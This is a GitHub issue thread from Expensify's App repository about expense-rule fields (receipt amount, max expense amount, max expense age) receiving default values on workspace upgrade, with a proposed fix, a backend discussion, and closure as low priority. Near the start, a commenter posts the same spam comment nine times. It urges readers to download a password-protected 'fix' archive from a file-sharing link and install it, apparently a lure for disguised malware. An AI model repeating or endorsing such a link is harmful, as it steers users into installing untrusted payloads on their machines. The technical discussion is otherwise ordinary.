### ISSUE TITLE
[$250] Rules - Expense rules are not empty by default

### ISSUE THREAD

**Issue by isagoico** [Expensify/App#48387] opened 2024-09-01 23:24 UTC
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:**
**Reproducible in staging?:** Yes
**Reproducible in production?:** Yes

**Expensify/Expensify Issue URL:** https://github.com/Expensify/Expensify/issues/424689

**Issue reported by:** Applause - Internal team

## Action Performed:
1. As the admin of a collect workspace - Navigate to "More Features"
2. Enable Rules
3. On the paywall - Click upgrade to enable the Control plan in the policy 
4. Navigate to the Rules page in workspace edito

## Expected Result:
When rules are first enabled no default will be set for Require receipt amount, Max expense amount, and Max expense age (days). As Described in the [design doc](https://docs.google.com/document/d/1oLr14YhL6Y0N5g4tbozdIIrFbybBlsRA0H9I8Wm--w8/edit?pli=1) in the "Individual expense rules" in "UI Additions & Changes Figma".

## Actual Result:
Require receipt amount, Max expense amount, and Max expense age (days) have default values. 

## Platforms:

Which of our officially supported platforms is this issue occurring on?
- [ ] Android: Native
- [ ] Android: mWeb Chrome
- [ ] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

![image](https://github.com/user-attachments/assets/578a4bed-274a-45c0-b287-e772f41edf1d)

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

CC @JmillsExpensify @marcaaron - I think this should be/should have been implemented in the following issue https://github.com/Expensify/App/issues/47013
<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~021834670232070295133</li>
        <li>Upwork Job ID: 1834670232070295133</li>
        <li>Last Price Increase: 2024-09-13</li>
<li>Automatic offers: </li>
<ul>
<li>suneox | Reviewer | 103951620</li>
<li>CyberAndrii | Contributor | 103951623</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @marcaaron</details>

**Comment by goncastrum** [comment] 2024-09-01 23:26
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:26
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:26
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:27
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:28
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:28
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:28
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:30
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 23:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by CyberAndrii** [comment] 2024-09-03 07:45
## Proposal

### Please re-state the problem that we are trying to solve in this issue.

Expense rules are not empty by default

### What is the root cause of that problem?

We set default values when a workspace is being upgraded

https://github.com/Expensify/App/blob/0e9f918425fb6c4a742516ea1aaa02a68a19527b/src/libs/actions/Policy/Policy.ts#L3413-L3415

### What changes do you think we should make in order to solve the problem?

Remove the 3 lines mentioned above. Additionally remove `DEFAULT_MAX_EXPENSE_AGE`, `DEFAULT_MAX_EXPENSE_AMOUNT`, and `DEFAULT_MAX_AMOUNT_NO_RECEIPT` from the `CONST`
 file as they will be no longer used.

**Comment by JmillsExpensify** [comment] 2024-09-03 22:36
@marcaaron should we keep this internal as part of the on-going implementation or handle externally?

**Comment by JmillsExpensify** [comment] 2024-09-11 14:24
Posted in Slack.

**Comment by marcaaron** [comment] 2024-09-13 19:07
I think the solution proposed above will work so we can make this `External`. There's no BE changes needed AFAICT. We just need to update these values to the `DISABLED_MAX_EXPENSE_VALUE`.

**Comment by CyberAndrii** [comment] 2024-09-14 11:12
Hm, when I went to record videos, my fix worked fine on the desktop app, but then in Safari it didn't. There seems to be a bug that prevents applying onyx data from the BE which tricked me into thinking this is a FE only issue. I managed to reproduce it by creating a workspace while offline. This causes the `CreateWorkspace` request to wait indefinitely for a response (you can see a loading indicator in devtools), which stalls the update queue.

So this also needs a fix on the backend. Should I still submit a PR?

https://github.com/user-attachments/assets/5d01c8a3-6d3f-42ca-9e19-d65213920f70

**Comment by suneox** [comment] 2024-09-15 03:23
@marcaaron  We need the backend to update the response value without the `maxExpense...` values 

<img width="686" alt="Screenshot 2024-09-15 at 09 56 21" src="https://github.com/user-attachments/assets/7cea5474-5bca-4375-b936-19379946dfca">

then we can apply FE change to update `optimisticData` without default values

**Comment by marcaaron** [comment] 2024-09-16 21:58
Ah bummer. Ok, I will raise the PR to fix this. 

>So this also needs a fix on the backend. Should I still submit a PR?

I mean we are still setting the optimistic data incorrectly so yes?

**Comment by marcaaron** [comment] 2024-09-16 22:18
Also just to make sure this is needed...

@JmillsExpensify the doc actually says:

>We won’t set a default for Require receipt amount, Max expense amount, and Max expense age (days) when Rules are first enabled.

I'm not sure that was intended to mean "when a user upgrades", but just when they "enable" rules - which is kind of distinct in that you could already be upgraded and enable or disable rules. It also seems like the "upgrade" path has logic to reset these back to defaults cc @youssef-lr who implemented the `UpgradeToCorporate`. 

My question is whether we still want those defaults baked in? I'm seeing that's the existing behavior on OldDot. Which makes me wonder whether we need to do anything here or if we can just close this one out.

**Comment by marcaaron** [comment] 2024-09-18 19:40
Still deciding if we want to do this, but I will make it a Weekly for now. The changes are pretty minor.

**Comment by marcaaron** [comment] 2024-09-25 03:42
I'm gonna make this a monthly and try to get to it when I return from OOO. If we are passionate about it then we can get someone to help sooner.

**Comment by suneox** [comment] 2024-09-30 15:43
We’re still waiting to the internal team to make a decision regarding the default value.

**Comment by suneox** [comment] 2024-10-03 19:18
Same above

**Comment by CyberAndrii** [comment] 2024-10-07 18:51
We have both daily and monthly labels here. Let's remove the daily one?

**Comment by suneox** [comment] 2024-10-07 18:59
@MelvinBot Not overdue

**Comment by suneox** [comment] 2024-10-11 18:22
Same above https://github.com/Expensify/App/issues/48387#issuecomment-2383559786

**Comment by JmillsExpensify** [comment] 2024-10-16 17:52
Not a high priority.

**Comment by marcaaron** [comment] 2024-10-16 22:11
No update yet.

**Comment by marcaaron** [comment] 2024-10-21 19:05
No update yet.

**Comment by suneox** [comment] 2024-11-25 17:09
Same above, we’re still waiting to the internal team to make a decision regarding the default value.

**Comment by JmillsExpensify** [comment] 2024-11-26 21:10
@marcaaron if we haven't gotten to this yet, I'm also just fine closing it.

**Comment by marcaaron** [comment] 2024-11-26 21:26
Ok, let's revisit this one later.

**Closed by marcaaron** 2024-11-26 21:26 UTC
Labels: External, Monthly, Overdue, Not a priority, Bug
